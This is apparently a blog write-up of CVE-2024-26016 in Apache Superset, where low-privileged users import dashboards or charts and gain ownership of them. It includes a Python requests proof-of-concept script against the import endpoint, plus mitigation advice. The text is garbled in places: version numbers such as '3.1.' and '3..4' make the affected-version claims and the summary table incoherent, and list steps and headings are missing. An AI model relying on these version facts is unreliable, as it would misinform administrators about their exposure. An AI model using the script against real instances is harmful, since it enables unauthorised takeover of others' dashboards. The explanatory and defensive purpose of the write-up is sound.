CVE-2024-26016 - How Low Privileged Users Could Hijack Dashboards in Apache Superset (Full Breakdown)

Apache Superset is a popular open-source platform for data exploration and dashboarding at scale. In February 2024, a security vulnerability was identified and assigned CVE-2024-26016. This vulnerability allows even low-level authenticated users to import and then take over dashboards or charts they wouldn’t normally be able to access — although, crucially, data-level access control is still enforced. Let’s break down this serious issue, how it happens, and what you can do to stay safe.

What’s the Issue in Plain English?

In normal use, Superset restricts what dashboards and charts a user can view or edit based on their roles (Admin, Gamma, etc). _CVE-2024-26016_ shows that a user with a regular account (not an admin) who does not have access to a dashboard or chart can still “import” it, trick Superset into making them the owner, and then change its metadata.

While they still can’t see the protected analytical data if data-level validation is set up, they now control the chart or dashboard’s settings and metadata, which could lead to confusion, privilege escalations, or further misuse.

Versions from 3.1. up to (but not including) 3.1.1

If you're running any of these, your instance could be at risk.

The Import Feature (Brief Intro)

Superset allows users to import dashboards and charts from JSON files. This is common for sharing templates between deployments, or for backup/restore. Normally, the platform should check _whether you have the right access_ before letting you import and take ownership.

Before the fix, the import endpoint wasn’t properly checking access. So, you could

1. Download the JSON export for a dashboard/chart (maybe obtained from a colleague, GitHub, or another source).

Log in as a low-privileged user (even a “Gamma” default role).

3. Import the JSON through /api/v1/<object>/import/ endpoint.
4. Superset would then assign _ownership_ of the dashboard or chart (the metadata) to you (the user executing the import).

Example: Importing and Hijacking a Dashboard

Here's a basic code snipplet using Python Requests to do this with a session cookie (assuming you’ve logged in via the UI already):

import requests

superset_url = "https://your-superset-instance";
import_endpoint = "/api/v1/dashboard/import/"

# Prepare your session cookie headers
headers = {
    'Cookie': 'session=YOUR_SESSION_COOKIE',
}

# Load the exported dashboard/chart JSON file
files = {
    'formData': ('dashboard_export.json', open('dashboard_export.json', 'rb')),
}

response = requests.post(superset_url + import_endpoint, headers=headers, files=files)

print('Status Code:', response.status_code)
print('Response:', response.text)

if response.status_code == 201:
    print("Dashboard imported & ownership assigned to you!")
else:
    print("Import failed or access denied.")

This would work even if you never had access to the source dashboard inside Superset before.

What Can an Attacker Do Next?

- Rename the dashboard/chart

“Share” the dashboard as if they created it

But _they cannot see the actual data_ behind the charts if they don’t have access according to row-level security/data source policies.

Confusion: Users could claim dashboards created by others

- Privilege escalation potential: If someone’s dashboard has relaxed data access controls, this workaround might expose data through manipulated metadata

How Was It Fixed?

The fix landed in version 3.1.1. Now, the import endpoint checks:

That you cannot assign yourself ownership of something you never had access to

Release Notes:
https://github.com/apache/superset/releases/tag/3.1.1

CVE Advisory:
- NVD - CVE-2024-26016

Apache Superset Security List:
- https://github.com/apache/superset/security/advisories

Least-Privilege Policy:

Review roles, especially users with import/export rights.

Data Security:

Remember that data access is still controlled, but misconfigured row-level security could elevate risk.

Restrict JSON Imports:

Consider restricting dashboard/chart imports to only trusted superusers/admins if your workflow allows.

Summary Table

| Version | Vulnerable | Safe |
|-----------------|:----------:|:-----:|
| < 3..4 | Yes | No |
| 3..4 | No | Yes |
| 3.1. | Yes | No |
| 3.1.1 and above | No | Yes |

Final Thoughts

_CVE-2024-26016_ shows that feature creep (like import/export) can introduce unexpected paths for privilege abuse, even if your data security policies are tight. Always stay on top of security advisories, especially for data-heavy, collaborative products like Apache Superset.

Further Reading

- Apache Superset Releases
- Superset Security Policy
- NVD entry for CVE-2024-26016

Timeline

Published on: 02/28/2024 12:15:47 UTC
Last modified on: 02/28/2024 15:15:09 UTC